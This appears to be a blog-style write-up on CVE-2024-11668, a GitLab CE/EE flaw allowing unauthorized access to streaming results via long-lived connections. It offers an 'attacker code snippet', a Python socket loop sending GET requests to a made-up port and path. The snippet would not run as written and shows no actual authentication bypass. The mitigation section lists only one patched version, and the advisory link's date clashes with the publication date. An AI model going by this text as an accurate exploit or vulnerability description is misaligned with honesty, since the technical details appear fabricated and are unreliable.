CVE-2024-11668: GitLab CE/EE Unauthorized Access to Streaming Results via Long-lived Connections

A critical vulnerability has been discovered in GitLab Community Edition(CE) and Enterprise Edition(EE), affecting all versions starting from 16.11 before 17.4.5, 17.5 before 17.5.3, and 17.6 before 17.6.1. The vulnerability, CVE-2024-11668, could potentially allow unauthorized access to streaming results through long-lived connections, bypassing authentication controls.

Exploit Details

The vulnerability is present in the way GitLab handles long-lived connections in CE and EE versions. An attacker with knowledge of this vulnerability can exploit it to maintain a long-lived connection without proper authentication, giving them access to sensitive streaming results of a GitLab instance.

This vulnerability poses a severe threat to organizations that rely on GitLab for developing software as it can lead to unauthorized access to private code repositories, sensitive information, and project management data, potentially leading to loss of intellectual property, insider threats, and external attacks.

Code Snippet

The following snippet demonstrates how an attacker can establish a long-lived connection without proper authorization, enabling them to access streaming results.

# Attacker code snippet
import socket
import time

def establish_connection():
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect(("your-gitlab-server", 905))
    return s

# Establish a long-lived connection
s = establish_connection()
while True:
    s.send("GET /projects/streaming-results HTTP/1.1\r\nHost: your-gitlab-server\r\n\r\n")
    time.sleep(60)

Mitigation

GitLab has already issued patches addressing the CVE-2024-11668 vulnerability in the following versions:

17.6.1 for the 17.6 branch

To protect your GitLab instance, it's highly advised to upgrade immediately to the patched versions.

Original References

1. GitLab Security Advisory: https://about.gitlab.com/releases/2024/05/15/cve-2024-11668-gitlab-ceee-unauthorized-access-to-streaming-results-via-long-lived-connections/
2. NVD - CVE-2024-11668: https://nvd.nist.gov/vuln/detail/CVE-2024-11668

Conclusion

The CVE-2024-11668 vulnerability exposes GitLab CE and EE instances to significant risks, including unauthorized access to sensitive streaming results. As this vulnerability affects a wide range of GitLab versions, it is critical that affected users take immediate steps to secure their GitLab instances and prevent unauthorized access to their repositories and project data by upgrading to the patched versions.

Timeline

Published on: 11/26/2024 19:15:22 UTC